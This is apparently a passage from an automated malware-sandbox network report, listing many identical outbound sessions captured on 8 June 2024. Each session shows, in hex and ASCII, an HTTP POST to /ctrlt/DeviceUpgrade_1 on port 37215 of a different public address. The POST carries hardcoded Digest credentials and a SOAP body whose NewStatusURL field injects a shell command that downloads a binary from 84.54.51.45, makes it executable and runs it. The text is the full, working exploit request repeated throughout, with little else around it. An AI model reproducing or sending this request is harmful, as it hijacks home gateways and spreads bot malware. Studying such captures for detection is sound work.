                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2175192.168.2.154373641.224.19.3637215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:16.671343088 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2176192.168.2.153606841.226.228.10637215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:16.671344995 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2177192.168.2.154699841.79.225.5737215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:16.671376944 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2178192.168.2.154569441.211.46.21937215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:16.671382904 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2179192.168.2.155741041.32.149.24037215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:16.671382904 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2180192.168.2.155831241.195.135.18337215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:16.671390057 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2181192.168.2.154812441.104.175.17637215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:16.671407938 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2182192.168.2.153356641.16.81.25537215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:16.671408892 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2183192.168.2.153515841.119.143.15937215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:16.671451092 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2184192.168.2.154071841.171.240.14037215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:16.671482086 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 